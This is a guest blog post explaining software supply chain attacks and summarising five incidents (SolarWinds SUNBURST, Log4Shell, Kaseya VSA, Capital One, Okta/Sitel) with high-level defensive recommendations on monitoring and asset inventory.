This blog was written by an independent guest blogger.
Over the past several years, hackers have gone from targeting only companies to also targeting their supply chain. One area of particular vulnerability is company software supply chains, which are becoming an increasingly common method of gaining access to valuable business information. A study by Gartner predicted that by 2025, 45% of companies will have experienced a supply chain attack.
Supply chain attacks can come in various ways, whether by malicious code injected into enterprise software or vulnerabilities in software your company uses. To mitigate this risk, companies must learn about the methods used to execute attacks and understand their company’s blind spots.
This article will look at 5 recent software supply chain attacks and how third-party partners can pose a security risk to your company. We’ll make recommendations for how to secure your business against supply chain attacks and how you can engage in early detection to respond to threats before they take down your enterprise.
What is a software supply chain attack?
The CISA or US Cybersecurity and Infrastructure Security Agency defines a software supply chain attack as an attack that “occurs when a cyber threat actor infiltrates a software vendor’s network and employs malicious code to compromise the software before the vendor sends it to their customers. The compromised software then compromises the customer’s data or system.”
A software supply chain includes any company you purchase software from and any open-source software and public repositories from which your developers pull code. It also includes any service organizations that have access to your data. In the aggregate, all of these different suppliers exponentially increase the surface area of a potential attack.
Software supply chain attacks are particularly dangerous because the software supply chain acts as an amplifier for hackers. This means that when one vendor is impacted, hackers can potentially reach any of their customers, giving them greater reach than if they attacked a single target corporation.
Two primary reasons contribute to the danger, according to CISA:
- Third-party software products usually require privileged access;
- They often require frequent communication between the vendor’s own network and the vendor’s software on customer networks.
Attackers leverage privileged access and a privileged network access channel as their first point of access. Depending on the level of available access, attackers can easily target many devices and levels of an organization. Some industries, like healthcare, are of particular vulnerability because they possess huge volumes of patient data subject to strict compliance regulations and laws.
Five major supply chain attacks
In recent memory, software supply chain attacks have gathered increased attention from the public because of how damaging they can be to a company and its reputation. The Log4j vulnerability demonstrated just how vulnerable companies can be to relying on third-party software, for example. Other high-profile attacks like the SolarWinds SUNBURST attack and Kaseya VSA (REvil) attack also provided painful reminders of how damaging supply chain attacks can be.
The SolarWinds SUNBURST backdoor
On December 13th, 2020, the SUNBURST backdoor was first disclosed. The attack utilized the popular SolarWinds Orion IT monitoring and management suite to develop a trojanized update.
The backdoor targeted services running the Orion software and was aimed at the US Treasury and Commerce Department. It was also noted that Fortune 500 and telecommunications companies, other government agencies, and universities were potentially impacted too.
In this case, the primary blind spot for companies was application servers and their software update pathways. The best course of action against this type of attack is to monitor the device.
Reports indicated that the command control (C&C) domain avsvmcloud[.]com was registered as early as February 26th, 2020. Like other types of supply chain attacks, the SUNBURST backdoor utilized a period of dormancy to avoid attributing aberrant behavior to software updates.
Of particular concern in the SUNBURST backdoor is also that dedicated servers were targeted. Often, these types of servers are less frequently monitored. Preventing SUNBURST backdoor-style attacks requires active monitoring at all levels of a company’s network.
Log4Shell / Log4j Exploit and Open Source Software vulnerabilities
Another concerning type of vulnerability is open source software vulnerabilities. The Log4Shell / Log4j exploit utilized the Java-based Apache utility Log4j. This exploit permitted hackers to execute remote code, including the capability of taking full control over the server. The Log4Shell exploit was a zero-day vulnerability, which means it was discovered before the software vendor was aware of it. Because the exploit was part of an open-source library, any of the 3 billion or more devices that run Java were potentially impacted.
Resolving the Log4Shell exploit and similar vulnerabilities requires having a complete inventory of all networked devices in your network. It means utilizing a system for discovering devices, monitoring for Log4Shell activity, and patching impacted devices as quickly as possible.
Kaseya VSA attack and Managed Services and Software Ransomware
The primary purpose of utilizing supply chain attacks is to exploit supplier vulnerabilities and attack downstream targets. That’s exactly what REvil, the ransomware group, did when they hijacked Kaseya VSA, a remote monitoring and managed services platform for IT systems and their customers.
By attacking a vulnerability in the Kaseya VSA, REvil was able to send ransomware downstream to up to 1,500 companies that were customers of Kaseya VSA.
In this case, the blind spot was internet-facing devices, devices under remote management, and the communication pathways of the managed service provider. The problem was caused by giving the vendor access to internal IT systems. Best practices to avoid a situation like this would be to monitor channels the managed service provider utilizes. Additionally, behavior analysis should track any unexpected behavior and analyze it to stop ransomware.
The Capital One attack and cloud infrastructure security flaws
Not all attacks are well-coordinated endeavors performed by elite hacking groups. Capital One experienced an extensive data breach when an Amazon employee leveraged insider knowledge of Amazon Web Services (AWS) to steal 100 million credit card applications. The attack publicized the dangers of utilizing cloud infrastructure.
The main blind spot with this attack was that utilizing a cloud service provider requires a customer to place vast amounts of trust in their vendor. This arrangement also means accepting the risk that if the cloud provider is compromised, your data may get compromised too. To combat these types of attacks, it’s key to engage in behavioral monitoring of your services and secure the edge of your network.
Bring Your Own Device (BYOD) vulnerabilities and vendor devices
In March of 2022, the globally recognized cybersecurity firm Okta revealed that one of its vendors (Sitel) had experienced a breach via an employee providing customer service functions on a laptop. Although the extent of the breach was limited, with only two Okta authentication systems being accessed, no customer accounts or configuration changes were made. Nonetheless, subcontractor devices and bring your own device policies represent an additional attack vector for attackers.
Unmanaged and unsanctioned devices on your network increase the potential attack surface every time an additional device is added. Companies lack information on which devices are connected, what software they’re running, and what precautions are being taken to protect against malware. Minimizing risk in this area requires creating an asset inventory and limiting access to these rogue devices. Finally, network monitoring and behavioral analysis can be used to stop attacks in their tracks.